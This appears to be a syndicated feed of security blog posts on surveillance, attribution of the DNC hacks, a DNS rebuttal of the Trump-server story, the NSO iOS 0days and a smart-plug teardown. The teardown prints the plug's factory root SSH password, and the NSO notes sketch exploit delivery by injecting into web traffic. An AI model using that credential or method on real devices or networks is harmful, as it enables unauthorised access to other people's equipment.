We can point to the governments that are using surveillance against their own citizens.

We can certainly blame the cyberweapons arms manufacturers that are selling those systems, and the countries — mostly European — that allow those arms manufacturers to sell those systems.

There’s a lot more the global Internet community could do to limit the availability of sophisticated Internet and telephony surveillance equipment to totalitarian governments. But I want to focus on another contributing cause to this problem: the fundamental insecurity of our digital systems that makes this a problem in the first place.

IMSI catchers are fake mobile phone towers. They allow someone to impersonate a cell network and collect information about phones in the vicinity of the device and they’re used to create lists of people who were at a particular event or near a particular location.

Fundamentally, the technology works because the phone in your pocket automatically trusts any cell tower to which it connects. There’s no security in the connection protocols between the phones and the towers.

IP intercept systems are used to eavesdrop on what people do on the Internet. Unlike the surveillance that happens at the sites you visit, by companies like Facebook and Google, this surveillance happens at the point where your computer connects to the Internet. Here, someone can eavesdrop on everything you do.

This system also exploits existing vulnerabilities in the underlying Internet communications protocols. Most of the traffic between your computer and the Internet is unencrypted, and what is encrypted is often vulnerable to man-in-the-middle attacks because of insecurities in both the Internet protocols and the encryption protocols that protect it.

There are many other examples. What they all have in common is that they are vulnerabilities in our underlying digital communications systems that allow someone — whether it’s a country’s secret police, a rival national intelligence organization, or criminal group — to break or bypass what security there is and spy on the users of these systems.

These insecurities exist for two reasons. First, they were designed in an era where computer hardware was expensive and inaccessibility was a reasonable proxy for security. When the mobile phone network was designed, faking a cell tower was an incredibly difficult technical exercise, and it was reasonable to assume that only legitimate cell providers would go to the effort of creating such towers.

At the same time, computers were less powerful and software was much slower, so adding security into the system seemed like a waste of resources. Fast forward to today: computers are cheap and software is fast, and what was impossible only a few decades ago is now easy.

The second reason is that governments use these surveillance capabilities for their own purposes. The FBI has used IMSI-catchers for years to investigate crimes. The NSA uses IP interception systems to collect foreign intelligence. Both of these agencies, as well as their counterparts in other countries, have put pressure on the standards bodies that create these systems to not implement strong security.

Of course, technology isn’t static. With time, things become cheaper and easier. What was once a secret NSA interception program or a secret FBI investigative tool becomes usable by less-capable governments and cybercriminals.

Man-in-the-middle attacks against Internet connections are a common criminal tool to steal credentials from users and hack their accounts.

IMSI-catchers are used by criminals, too. Right now, you can go onto Alibaba.com and buy your own IMSI catcher for under $2,000.

Despite their uses by democratic governments for legitimate purposes, our security would be much better served by fixing these vulnerabilities in our infrastructures.

These systems are not only used by dissidents in totalitarian countries, they’re also used by legislators, corporate executives, critical infrastructure providers, and many others in the US and elsewhere.

That we allow people to remain insecure and vulnerable is both wrongheaded and dangerous.

Earlier this month, two American legislators — Senator Ron Wyden and Rep Ted Lieu — sent a letter to the chairman of the Federal Communications Commission, demanding that he do something about the country’s insecure telecommunications infrastructure.

They pointed out that not only are insecurities rampant in the underlying protocols and systems of the telecommunications infrastructure, but also that the FCC knows about these vulnerabilities and isn’t doing anything to force the telcos to fix them.

Wyden and Lieu make the point that fixing these vulnerabilities is a matter of US national security, but it’s also a matter of international human rights. All modern communications technologies are global, and anything the US does to improve its own security will also improve security worldwide.

Yes, it means that the FBI and the NSA will have a harder job spying, but it also means that the world will be a safer and more secure place.

This essay previously appeared on AlJazeera.com.

Attributing the DNC Hacks to Russia

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/01/attributing_the_1.html

President Barack Obama’s public accusation of Russia as the source of the hacks in the US presidential election and the leaking of sensitive e-mails through WikiLeaks and other sources has opened up a debate on what constitutes sufficient evidence to attribute an attack in cyberspace. The answer is both complicated and inherently tied up in political considerations.

The administration is balancing political considerations and the inherent secrecy of electronic espionage with the need to justify its actions to the public. These issues will continue to plague us as more international conflict plays out in cyberspace.

It’s true that it’s easy for an attacker to hide who he is in cyberspace. We are unable to identify particular pieces of hardware and software around the world positively. We can’t verify the identity of someone sitting in front of a keyboard through computer data alone. Internet data packets don’t come with return addresses, and it’s easy for attackers to disguise their origins. For decades, hackers have used techniques such as jump hosts, VPNs, Tor and open relays to obscure their origin, and in many cases they work. I’m sure that many national intelligence agencies route their attacks through China, simply because everyone knows lots of attacks come from China.

On the other hand, there are techniques that can identify attackers with varying degrees of precision. It’s rarely just one thing, and you’ll often hear the term “constellation of evidence” to describe how a particular attacker is identified. It’s analogous to traditional detective work. Investigators collect clues and piece them together with known mode of operations. They look for elements that resemble other attacks and elements that are anomalies. The clues might involve ones and zeros, but the techniques go back to Sir Arthur Conan Doyle.

The University of Toronto-based organization Citizen Lab routinely attributes attacks against the computers of activists and dissidents to particular Third World governments. It took months to identify China as the source of the 2012 attacks against the New York Times. While it was uncontroversial to say that Russia was the source of a cyberattack against Estonia in 2007, no one knew if those attacks were authorized by the Russian government — until the attackers explained themselves. And it was the Internet security company CrowdStrike, which first attributed the attacks against the Democratic National Committee to Russian intelligence agencies in June, based on multiple pieces of evidence gathered from its forensic investigation.

Attribution is easier if you are monitoring broad swaths of the Internet. This gives the National Security Agency a singular advantage in the attribution game. The problem, of course, is that the NSA doesn’t want to publish what it knows.

Regardless of what the government knows and how it knows it, the decision of whether to make attribution evidence public is another matter. When Sony was attacked, many security experts — myself included­ — were skeptical of both the government’s attribution claims and the flimsy evidence associated with it. I only became convinced when the New York Times ran a story about the government’s attribution, which talked about both secret evidence inside the NSA and human intelligence assets inside North Korea. In contrast, when the Office of Personnel Management was breached in 2015, the US government decided not to accuse China publicly, either because it didn’t want to escalate the political situation or because it didn’t want to reveal any secret evidence.

The Obama administration has been more public about its evidence in the DNC case, but it has not been entirely public.

It’s one thing for the government to know who attacked it. It’s quite another for it to convince the public who attacked it. As attribution increasingly relies on secret evidence­ — as it did with North Korea’s attack of Sony in 2014 and almost certainly does regarding Russia and the previous election — ­the government is going to have to face the choice of making previously secret evidence public and burning sources and methods, or keeping it secret and facing perfectly reasonable skepticism.

If the government is going to take public action against a cyberattack, it needs to make its evidence public. But releasing secret evidence might get people killed, and it would make any future confidentiality assurances we make to human sources completely non-credible. This problem isn’t going away; secrecy helps the intelligence community, but it wounds our democracy.

The constellation of evidence attributing the attacks against the DNC, and subsequent release of information, is comprehensive. It’s possible that there was more than one attack. It’s possible that someone not associated with Russia leaked the information to WikiLeaks, although we have no idea where that someone else would have obtained the information. We know that the Russian actors who hacked the DNC­ — both the FSB, Russia’s principal security agency, and the GRU, Russia’s military intelligence unit — ­are also attacking other political networks around the world.

In the end, though, attribution comes down to whom you believe. When Citizen Lab writes a report outlining how a United Arab Emirates human rights defender was targeted with a cyberattack, we have no trouble believing that it was the UAE government. When Google identifies China as the source of attacks against Gmail users, we believe it just as easily.

Obama decided not to make the accusation public before the election so as not to be seen as influencing the election. Now, afterward, there are political implications in accepting that Russia hacked the DNC in an attempt to influence the US presidential election. But no amount of evidence can convince the unconvinceable.

The most important thing we can do right now is deter any country from trying this sort of thing in the future, and the political nature of the issue makes that harder. Right now, we’ve told the world that others can get away with manipulating our election process as long as they can keep their efforts secret until after one side wins. Obama has promised both secret retaliations and public ones. We need to hope they’re enough.

This essay previously appeared on CNN.com.

EDITED TO ADD: The ODNI released a declassified report on the Russian attacks. Here’s a New York Times article on the report.

And last week there were Senate hearings on this issue.

EDITED TO ADD: A Washington Post article talks about some of the intelligence behind the assessment.

EDITED TO ADD (1/10): The UK connection.

2016-12-29 33c3 – малко лекции

Post Syndicated from Vasil Kolev original https://vasil.ludost.net/blog/?p=3332

Тази година гледам 33c3 от вкъщи, и май гледам по-малко лекции. Ето какво съм гледал до тук:
(обработените лекции са на media.ccc.de, ако ги няма тук може да се търсят на relive)

What could possibly go wrong with <insert x86 instruction here>? беше описание и демонстрационен код как може да чрез ползване на кеша (flush-ване, напълване и т.н.) да се комуникира между несвързани процеси или дори виртуални машини, които се schedule-ват на същия процесор (т.е. и между core-ове, които споделят кеш).

How Do I Crack Satellite and Cable Pay TV? беше за reverse-ване на чиповете, които декриптират сателитна телевизия, прилично интересно.

Building a high throughput low-latency PCIe based SDR са хора, които разработват software-defined radio на mini PCIe карта, което може да се използва за всякакви по-сериозни цели (има включително синхронизация на часовника от GPS), като за момента са до средата (не са си постигнали целта за скорост на устройството), и ако постигнат прилична цена, това може да се окаже идеалното устройство за правене на софтуерни GSM/LTE неща.

Shut Up and Take My Money! беше за как са счупили на някакви хора мобилното приложение, което се занимава с потребителски транзакции. Звучеше като да трябва да затворят тия, дето са го мислили/писали.

What’s It Doing Now? беше доста интересна лекция за автопилоти по самолети, как тоя тип автоматика трябва да се следи внимателно и като цяло, че нещата не са толкова автомагически, колкото ни се иска. Лекциите за самолетни проблеми винаги са интересни 🙂

Nintendo Hacking 2016 описа какво са счупили по разлините nintendo устройства, exploit-и по boot loader-и и всякакви такива неща. Това беше една от лекциите, в която се споменаваше техниката с glitching – да се подаде по-нисък волтаж за малко, така че дадена инструкция да се намаже и да има шанс да се JMP-не някъде в наш код в някакъв момент, така че да можем да dump-нем нещо.

Where in the World Is Carmen Sandiego? беше лекция за чупенето на системите за резервиране на самолетни билети и като цяло пътувания. Силно тъжно, казаха си в началото, че няма много хакване в лекцията, понеже нещата са твърде счупени и лесни за атака. Кратък съвет – не си публикувайте снимка на boarding pass-а.

You can -j REJECT but you can not hide: Global scanning of the IPv6 Internet е разработка с DNS за сравнително лесно сканиране на всички съществуващи IPv6 DNS PTR записи, та да се намерят повечето съществуващи сървъри. Доста идейно и вероятно ще го тествам някъде 🙂

Tapping into the core описва интересно устройство за дебъгване/слушане на intel-ски процесори през USB и вероятно и мрежа, т.е. дебъгер, който може директно да пипа процесора. Звучи многообещаващо (лекцията гледаше основно на това като начин за правене на rootkit-ове).

Recount 2016: An Uninvited Security Audit of the U.S. Presidential Election беше много празни приказки за изборите в щатите, за пре-преброяване, в което не са открили проблем, и като цяло за счупената им система.

The Untold Story of Edward Snowden’s Escape from Hong Kong разказваше за двете седмици на Edward Snowden в Хонг Конг и бежанците, при които са го крили, преди да отлети, заедно с призив за fundraiser за тях.

State of Internet Censorship 2016 беше нормалното описание, заедно с проектите, чрез които се изследва. В общи линии изводът беше, че вече цензурирането е узаконено почти навсякъде, където се случва и става все по-често явление някоя държава да си спре internet-а за малко, около разни събития.

Million Dollar Dissidents and the Rest of Us описа какви таргетирани методи се използват от различни правителства (и кой им ги продава и учи) за hack-ване и вадене на данни от всякакви устройства на неприятни за тях хора. Нещата са прилично напреднали и е все по-ясно как повечето ни софтуер не става за secure дейности.

On Smart Cities, Smart Energy, And Dumb Security беше за колко са счупени “smart” електромерите и как сигурността на тия неща никой не и обръща сериозно внимание.

Dissecting modern (3G/4G) cellular modems беше интересно описание на съществуващ хардуер, който може да се използва за 3g/4g модем (който се използва в единия iPhone даже), и който накрая се оказа, че търкаля android/linux в себе си (т.е. може спокойно да се каже, че в iPhone 6 (ако не се лъжа) има един linux/adroid).

Тия дни ще догледам още някакви от записи и каквото остава утре и ще пиша пак. Много ми се иска да изгледам повечето неща за random генераторите и лекцията за HDMI.

In which I have to debunk a second time

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html

So Slate is doubling-down on their discredited story of a secret Trump server. Tip for journalists: if you are going to argue against an expert debunking your story, try to contact that expert first, so they don’t have to do what I’m going to do here, showing obvious flaws. Also, pay attention to the data.

The experts didn’t find anything

The story claims:

“I spoke with many DNS experts. They found the evidence strongly suggestive of a relationship between the Trump Organization and the bank”.

No, he didn’t. He gave experts limited information and asked them whether it’s consistent with a conspiracy theory. He didn’t ask if it was “suggestive” of the conspiracy theory, or that this was the best theory that fit the data.

This is why “experts” quoted in the press need to go through “media training”, to avoid getting your reputation harmed by bad journalists who try their best to put words in your mouth. You’ll be trained to recognize bad journalists like this, and how not to get sucked into their fabrications.

Jean Camp isn’t an expert

On the other hand, Jean Camp isn’t an expert. I’ve never heard of her before. She gets details wrong. Take for example in this blogpost where she discusses lookups for the domain mail.trump-email.com.moscow.alfaintra.net. She says:

This query is unusual in that is merges two hostnames into one. It makes the most sense as a human error in inserting a new hostname in some dialog window, but neglected to hit the backspace to delete the old hostname.

Uh, no. It’s normal DNS behavior with non-FQDNs. If the lookup for a name fails, computers will try again, pasting the local domain on the end. In other words, when Twitter’s DNS was taken offline by the DDoS attack a couple weeks ago, those monitoring DNS saw a zillion lookups for names like “www.twitter.com.example.com“.

I’ve reproduced this on my desktop by configuring the suffix moscow.alfaintra.net.

I then pinged “mail1.trump-email.com” and captured the packets. As you can see, after the initial lookups fail, Windows tried appending the suffix.

I don’t know what Jean Camp is an expert of, but this is sorta a basic DNS concept. It’s surprising she’d get it wrong. Of course, she may be an expert in DNS who simply had a brain fart (this happens to all of us), but looking across her posts and tweets, she doesn’t seem to be somebody who has a lot of experience with DNS. Sorry for impugning her credibility, but that’s the way the story is written. It demands that we trust the quoted “experts”. 
Call up your own IT department at Slate. Ask your IT nerds if this is how DNS operates. Note: I’m saying your average, unremarkable IT nerds can debunk an “expert” you quote in your story.
Understanding “spam” and “blacklists”

The new article has a paragraph noting that the IP address doesn’t appear on spam blocklists:

Was the server sending spam—unsolicited mail—as opposed to legitimate commercial marketing? There are databases that assiduously and comprehensively catalog spam. I entered the internet protocal address for mail1.trump-email.com to check if it ever showed up in Spamhaus and DNSBL.info. There were no traces of the IP address ever delivering spam.

This is a profound misunderstanding of how these things work.

Colloquially, we call those sending mass marketing emails, like Cendyn, “spammers”. But those running blocklists have a narrower definition. If  emails contain an option to “opt-out” of future emails, then it’s technically not “spam”.

Cendyn is constantly getting added to blocklists when people complain. They spend considerable effort contacting the many organizations maintaining blocklists, proving they do “opt-outs”, and getting “white-listed” instead of “black-listed”. Indeed, the entire spam-blacklisting industry is a bit of scam — getting white-listed often involves a bit of cash.

Those maintaining blacklists only go back a few months. The article is in error saying there’s no record ever of Cendyn sending spam. Instead, if an address comes up clean, it means there’s no record for the past few months. And, if Cendyn is in the white-lists, there would be no record of “spam” at all, anyway.

As somebody who frequently scans the entire Internet, I’m constantly getting on/off blacklists. It’s a real pain. At the moment, my scanner address “209.126.230.71” doesn’t appear to be on any blacklists. Next time a scan kicks off, it’ll probably get added — but only by a few, because most have white-listed it.

There is no IP address limitation

The story repeats the theory, which I already debunked, that the server has a weird configuration that limits who can talk to it:

The scientists theorized that the Trump and Alfa Bank servers had a secretive relationship after testing the behavior of mail1.trump-email.com using sites like Pingability. When they attempted to ping the site, they received the message “521 lvpmta14.lstrk.net does not accept mail from you.”

No, that’s how Listrake (who is the one who actually controls the server) configures all their marketing servers. Anybody can confirm this themselves by ping all the servers in this range:
In case you don’t want to do scans yourself, you can look up on Shodan and see that there’s at least 4000 servers around the Internet who give the same error message.

Again, go back to Chris Davis in your original story ask him about this. He’ll confirm that there’s nothing nefarious or weird going on here, that it’s just how Listrak has decided to configure all it’s spam-sending engines.

Either this conspiracy goes much deeper, with hundreds of servers involved, or this is a meaningless datapoint.
Where did the DNS logs come from?
Tea Leaves and Jean Camp are showing logs of private communications. Where did these logs come from? This information isn’t public. It means somebody has done something like hack into Alfa Bank. Or it means researchers who monitor DNS (for maintaing DNS, and for doing malware research) have broken their NDAs and possibly the law.
The data is incomplete and inconsistent. Those who work for other companies, like Dyn, claim it doesn’t match their own data. We have good reason to doubt these logs. There’s a good chance that the source doesn’t have as comprehensive a view as “Tea Leaves” claim. There’s also a good chance the data has been manipulated.
Specifically, I have as source who claims records for trump-email.com were changed in June, meaning either my source or Tea Leaves is lying.
Until we know more about the source of the data, it’s impossible to believe the conclusions that only Alfa Bank was doing DNS lookups.

By the way, if you are a company like Alfa Bank, and you don’t want the “research” community from seeing leaked intranet DNS requests, then you should probably reconfigure your DNS resolvers. You’ll want to look into RFC7816 “query minimization”, supported by the Unbound and Knot resolvers.

Do the graphs show interesting things?

The original “Tea Leaves” researchers are clearly acting in bad faith. They are trying to twist the data to match their conclusions. For example, in the original article, they claim that peaks in the DNS activity match campaign events. But looking at the graph, it’s clear these are unrelated. It display the common cognitive bias of seeing patterns that aren’t there.
Likewise, they claim that the timing throughout the day matches what you’d expect from humans interacting back and forth between Moscow and New York. No. This is what the activity looks like, graphing the number of queries by hour:
As you can see, there’s no pattern. When workers go home at 5pm in New York City, it’s midnight in Moscow. If humans were involved, you’d expect an eight hour lull during that time. Likewise, when workers arrive at 9am in New York City, you expect a spike in traffic for about an hour until workers in Moscow go home. You see none of that here. What you instead see is a random distribution throughout the day — the sort of distribution you’d expect if this were DNS lookups from incoming spam.
The point is that we know the original “Tea Leaves” researchers aren’t trustworthy, that they’ve convinced themselves of things that just aren’t there.
Does Trump control the server in question?

OMG, this post asks the question, after I’ve debunked the original story, and still gotten the answer wrong.
The answer is that Listrak controls the server. Not even Cendyn controls it, really, they just contract services from Listrak. In other words, not only does Trump not control it, the next level company (Cendyn) also doesn’t control it.
Does Trump control the domain in question?
OMG, this new story continues to make the claim the Trump Organization controls the domain trump-email.com, despite my debunking that Cendyn controls the domain.
Look at the WHOIS info yourself. All the contact info goes to Cendyn. It fits the pattern Cendyn chooses for their campaigns.
  • trump-email.com
  • mjh-email.com
  • denihan-email.com
  • hyatt-email.com
Cendyn even spells “Trump Orgainzation” wrong.

There’s a difference between a “server” and a “name”

The article continues to make trivial technical errors, like confusing what a server is with what a domain name is. For example:

One of the intriguing facts in my original piece was that the Trump server was shut down on Sept. 23, two days after the New York Times made inquiries to Alfa Bank

The server has never been shutdown. Instead, the name “mail1.trump-email.com” was removed from Cendyn’s DNS servers.
It’s impossible to debunk everything in these stories because they garble the technical details so much that it’s impossible to know what the heck they are claiming.
Why did Cendyn change things after Alfa Bank was notified?

It’s a curious coincidence that Cendyn changed their DNS records a couple days after the NYTimes contacted Alfa Bank.
But “coincidence” is all it is. I have years of experience with investigating data breaches. I know that such coincidences abound. There’s always weird coincidence that you are certain are meaningful, but which by the end of the investigation just aren’t.
The biggest source of coincidences is that IT is always changing things and always messing things up. It’s the nature of IT. Thus, you’ll always see a change in IT that matches some other event. Those looking for conspiracies ignore the changes that don’t match, and focus on the one that does, so it looms suspiciously.
As I’ve mentioned before, I have source that says Cendyn changed things around in June. This makes me believe that “Tea Leaves” is editing changes to highlight the one in September.
In any event, many people have noticed that the registrar email “Emily McMullin” has the same last name as Evan McMullin running against Trump in Utah. This supports my point: when you do hacking investigations, you find irrelevant connections all over the freakin’ place.
“Experts stand by their analysis”

This new article states:

I’ve checked back with eight of the nine computer scientists and engineers I consulted for my original story, and they all stood by their fundamental analysis

Well, of course, they don’t want to look like idiots. But notice the subtle rephrasing of the question: the experts stand by their analysis. It doesn’t mean the same thing as standing behind the reporters analysis. The experts made narrow judgements, which even I stand behind as mostly correct, given the data they were given at the time. None of them were asked whether the entire conspiracy theory holds up.
What you should ask is people like Chris Davis or Paul Vixie whether they stand behind my analysis in the past two posts. Or really, ask any expert. I’ve documented things in sufficient clarity. For example, go back to Chris Davis and ask him again about the “limited IP address” theory, and whether it holds up against my scan of that data center above.
Conclusion

Other major news outlets all passed on the story, because even non experts know it’s flawed. The data means nothing. The Slate journalist nonetheless went forward with the story, tricking experts, and finding some non-experts.
But as I’ve shown, given a complete technical analysis, the story falls apart. Most of what’s strange is perfectly normal. The data itself (the DNS logs) are untrustworthy. It builds upon unknown things (like how the mail server rejects IP address) as “unknowable” things that confirm the conspiracy, when they are in fact simply things unknown at the current time, which can become knowable with a little research.

What I show in my first post, and this post, is more data. This data shows context. This data explains the unknowns that Slate present. Moreover, you don’t have to trust me — anybody can replicate my work and see for themselves.


iOS 9.3.5 Fixes Malware Exploit: Install It, but Backup First!

Post Syndicated from Peter Cohen original https://www.backblaze.com/blog/install-ios-935-backup-first/

Update your iPhone or iPad

Apple this week posted important an update to iOS 9. Version 9.3.5 is ready for download from Apple’s servers. Experts advise you to upgrade right away, since it closes a malware security vulnerability. It’s good advice, even if the risk is small to most of us. Make sure to back up your iPhone or iPad first, though. Here’s info on what’s going on and how to protect yourself.

First of all, if there’s one takeaway from the story: Don’t click on a link unless you know what’s inside.

A human rights dissident named Ahmed Mansoor received a strange text message on his iPhone encouraging him to click a link. He didn’t. Instead Mansoor reported it to a security research firm. Researchers think that it was a sophisticated effort to take over Mansoor’s iPhone. The code belongs to a company that makes government spyware.

The security group alerted Apple and didn’t publicize the break until after Apple issued the patch.

What is a zero-day exploit?

The original report says that hackers have combined “zero-day” exploits in iOS to remotely jailbreak a targeted iPhone. “Zero-day” is security shorthand for “this problem hadn’t been patched by the software maker when it was found.” (“Jailbreaking” enables software to be installed on the iPhone that Apple doesn’t allow otherwise.)

The folks at Macworld have the skinny on what’s going on here:

When used together, the exploits allow someone to hijack an iOS device and control or monitor it remotely. Hijackers would have access to the device’s camera and microphone, and could capture audio calls even in otherwise end-to-end secured apps like WhatsApp. They could also grab stored images, tracking movements, and retrieve files.

It’s important to understand that according to the security experts who have examined the code, this particular exploit was targeted to be delivered to a specific person. It was only his general awareness and suspicion something was wrong that prevented the software from getting installed.

In other words, this isn’t like a phishing or a botnet scheme, where the goal is to get as many devices infected as possible. Instead, this was an effort by government actors to target a specific individual.

That means that the risk to you that you might be exploited by this particular problem is relatively low, unless you’re in the crosshairs of a government agency (or unless malware programmers figure out another way to exploit this particular threat for other reasons).

Risk, low. So don’t panic. But the threat is still there, which is why Apple’s pushed the 9.3.5 update and is recommending that everyone who’s running iOS 9 install it promptly.

Should I back up before I update?

Yes! Backup before you make any fundamental changes to your device. It’s a good idea to make sure any essential information is stored safely somewhere else.

You can backup your device using iTunes on the Mac or PC. Use the Lightning cable that came with your iOS device and connect it to an open USB port, then open iTunes to backup. You can also use iCloud Backup, Apple’s cloud-based backups ervice. Here’s a guide to backing up your iPhone or iPad with more details.

In general, we advocate the 3-2-1 Backup Strategy. Always have three copies of your data. One is your local copy (the data on your iPhone or iPad, for example). The second is a local backup (using iTunes on your Mac or PC, for example). The third is a copy stored safely offsite, in case anything happens – the cloud, for example.

iCloud Backup is one option for offsite backup. Backblaze will back up your computer’s iTunes files including that local backup. So if you backup to your computer, then use Backblaze, you’re all set.

How do I update my iPhone or iPad?

Follow these steps to make sure iOS 9.3.5 is installed on your device. First of all, make sure your device is charged and connected to a Wi-Fi network.

  1. Tap the iPhone or iPad’s Home button.
  2. Tap Settings.
  3. Tap General.
  4. Tap Software Update.
  5. The device will check for an update. Your device will automatically restart after it’s done.

How to Update to 9.3.5

What do I do now?

Breathe a sigh of relief now that you have iOS 9.3.5 installed. At least until the next security exploit pops up. Just make sure to backup early and often, to make sure your device and your data is safe.

The post iOS 9.3.5 Fixes Malware Exploit: Install It, but Backup First! appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Notes on the Apple/NSO Trident 0days

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/08/notes-on-applenso-trident-0days.html

I thought I’d write up some comments on today’s news of the NSO malware using 0days to infect human rights activist phones. For full reference, you want to read the Citizen’s Lab report and the Lookout report.

Press: it’s news to you, it’s not news to us

I’m seeing breathless news articles appear. I dread the next time that I talk to my mom that she’s going to ask about it (including “were you involved”). I suppose it is new to those outside the cybersec community, but for those of us insiders, it’s not particularly newsworthy. It’s just more government malware going after activists. It’s just one more set of 0days.

I point this out in case press wants to contact for some awesome sounding quote about how exciting/important this is. I’ll have the opposite quote.

Don’t panic: all patches fix 0days

We should pay attention to context: all patches (for iPhone, Windows, etc.) fix 0days that hackers can use to break into devices. Normally these 0days are discovered by the company itself or by outside researchers intending to fix (and not exploit) the problem. What’s different here is that where most 0days are just a theoretical danger, these 0days are an actual danger — currently being exploited by the NSO Group’s products. Thus, there’s maybe a bit more urgency in this patch compared to other patches.

Don’t panic: NSA/Chinese/Russians using secret 0days anyway

It’s almost certain the NSA, the Chinese, and the Russian have similar 0days. That means applying this patch makes you safe from the NSO Group (for a while, until they find new 0days), but it’s unlikely this patch makes you safe from the others.

Of course it’s multiple 0days

Some people are marveling how the attack includes three 0days. That’s been the norm for browser exploits for a decade now. There’s sandboxes and ASLR protections to get through. There’s privilege escalation to get into the kernel. And then there’s persistence. How far you get in solving one or more of these problems with a single 0day depends upon luck.

It’s actually four 0days

While it wasn’t given a CVE number, there was a fourth 0day: the persistence using the JavaScriptCore binary to run a JavaScript text file. The JavaScriptCore program appears to be only a tool for developers and not needed the functioning of the phone. It appears that the iOS 9.3.5 patch disables. While technically, it’s not a coding “bug”, it’s still a design bug. 0days solving the persistence problem (where the malware/implant runs when phone is rebooted) are worth over a hundred thousand dollars all on their own.

That about wraps it up for VEP

VEP is Vulnerability Equities Process that’s supposed to, but doesn’t, manage how the government uses 0days it acquires.

Agitators like the EFF have been fighting against the NSA’s acquisition and use of 0days, as if this makes us all less secure. What today’s incident shows is that acquisition/use of 0days will be widespread around the world, regardless what the NSA does. It’s be nice to get more transparency about what they NSA is doing through the VEP process, but the reality is the EFF is never going to get anything close to what it’s agitating for.

That about wraps is up for Wassenaar

Wassenaar is an internal arms control “treaty”. Left-wing agitators convinced the Wassenaar folks to add 0days and malware to the treaty — with horrific results. There is essentially no difference between bad code and good code, only how it’s used, so the the Wassenaar extensions have essentially outlawed all good code and security research.

Some agitators are convinced Wassenaar can be still be fixed (it can’t). Israel, where NSO Group is based, is not a member of Wassenaar, and thus whatever limitations Wassenaar could come up with would not stop the NSO.

Some have pointed out that Israel frequently adopts Wassenaar rules anyway, but they would then simply transfer the company somewhere else, such as Singapore.

The point is that 0day development is intensely international. There are great 0day researchers throughout the non-Wassenaar countries. It’s not like precision tooling for aluminum cylinders (for nuclear enrichment) that can only be made in an industrialized country. Some of the best 0day researchers come from backwards countries, growing up with only an Internet connection.

BUY THAT MAN AN IPHONE!!!

The victim in this case, Ahmed Mansoor, has apparently been hacked many time, including with HackingTeam’s malware and Finfisher malware — notorious commercial products used by evil government’s to hack into dissident’s computers.

Obviously, he’ll be hacked again. He’s a gold mine for researchers in this area. The NSA, anti-virus companies, Apple jailbreak companies, and the like should be jumping over themselves offering this guy a phone. One way this would work is giving him a new phone every 6 months in exchange for the previous phone to analyze.

Apple, of course, should head the list of companies doing this, proving “activist phones” to activists with their own secret monitoring tools installed so that they can regularly check if some new malware/implant has been installed.

iPhones are still better, suck it Android

Despite the fact that everybody and their mother is buying iPhone 0days to hack phones, it’s still the most secure phone. Androids are open to any old hacker — iPhone are open only to nation state hackers.

Use signal, use Tor

I didn’t see Signal on the list of apps the malware tapped into. There’s no particular reason for this, other than NSO haven’t gotten around to it yet. But I thought I’d point how yet again, Signal wins.

SMS vs. MitM

Some have pointed to SMS as the exploit vector, which gave Citizen’s Lab the evidence that the phone had been hacked.

It’s a Safari exploit, so getting the user to visit a web page is required. This can be done over SMS, over email, over Twitter, or over any other messaging service the user uses. Presumably, SMS was chosen because users are more paranoid of links in phishing emails than they are SMS messages.

However, the way it should be doing is with man-in-the-middle (MitM) tools in the infrastructure. Such a tool would wait until the victim visited any webpage via Safari, then magically append the exploit to the page. As Snowden showed, this is apparently how the NSA does it, which is probably why they haven’t gotten caught yet after exploiting iPhones for years.

The UAE (the government who is almost certainly trying to hack Mansoor’s phone) has the control over their infrastructure in theory to conduct a hack. We’ve already caught other governments doing similar things (like Tunisia). My guess is they were just lazy, and wanted to do it the easiest way for them.


How the Iranian Government Hacks Dissidents

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/08/how_the_iranian.html

Citizen Lab has a new report on an Iranian government hacking program that targets dissidents. From a Washington Post op-ed by Ron Deibert:

Al-Ameer is a net savvy activist, and so when she received a legitimate looking email containing a PowerPoint attachment addressed to her and purporting to detail “Assad Crimes,” she could easily have opened it. Instead, she shared it with us at the Citizen Lab.

As we detail in a new report, the attachment led our researchers to uncover an elaborate cyberespionage campaign operating out of Iran. Among the malware was a malicious spyware, including a remote access tool called “Droidjack,” that allows attackers to silently control a mobile device. When Droidjack is installed, a remote user can turn on the microphone and camera, remove files, read encrypted messages, and send spoofed instant messages and emails. Had she opened it, she could have put herself, her friends, her family and her associates back in Syria in mortal danger.

Here’s the report. And a news article.

I’ve bought some more awful IoT stuff

Post Syndicated from Matthew Garrett original http://mjg59.dreamwidth.org/43486.html

I bought some awful WiFi lightbulbs a few months ago. The short version: they introduced terrible vulnerabilities on your network, they violated the GPL and they were also just bad at being lightbulbs. Since then I’ve bought some other Internet of Things devices, and since people seem to have a bizarre level of fascination with figuring out just what kind of fractal of poor design choices these things frequently embody, I thought I’d oblige.

Today we’re going to be talking about the KanKun SP3, a plug that’s been around for a while. The idea here is pretty simple – there’s lots of devices that you’d like to be able to turn on and off in a programmatic way, and rather than rewiring them the simplest thing to do is just to insert a control device in between the wall and the device andn ow you can turn your foot bath on and off from your phone. Most vendors go further and also allow you to program timers and even provide some sort of remote tunneling protocol so you can turn off your lights from the comfort of somebody else’s home.

The KanKun has all of these features and a bunch more, although when I say “features” I kind of mean the opposite. I plugged mine in and followed the install instructions. As is pretty typical, this took the form of the plug bringing up its own Wifi access point, the app on the phone connecting to it and sending configuration data, and the plug then using that data to join your network. Except it didn’t work. I connected to the plug’s network, gave it my SSID and password and waited. Nothing happened. No useful diagnostic data. Eventually I plugged my phone into my laptop and ran adb logcat, and the Android debug logs told me that the app was trying to modify a network that it hadn’t created. Apparently this isn’t permitted as of Android 6, but the app was handling this denial by just trying again. I deleted the network from the system settings, restarted the app, and this time the app created the network record and could modify it. It still didn’t work, but that’s because it let me give it a 5GHz network and it only has a 2.4GHz radio, so one reset later and I finally had it online.

The first thing I normally do to one of these things is run nmap with the -O argument, which gives you an indication of what OS it’s running. I didn’t really need to in this case, because if I just telnetted to port 22 I got a dropbear ssh banner. Googling turned up the root password (“p9z34c”) and I was logged into a lightly hacked (and fairly obsolete) OpenWRT environment.

It turns out that here’s a whole community of people playing with these plugs, and it’s common for people to install CGI scripts on them so they can turn them on and off via an API. At first this sounds somewhat confusing, because if the phone app can control the plug then there clearly is some kind of API, right? Well ha yeah ok that’s a great question and oh good lord do things start getting bad quickly at this point.

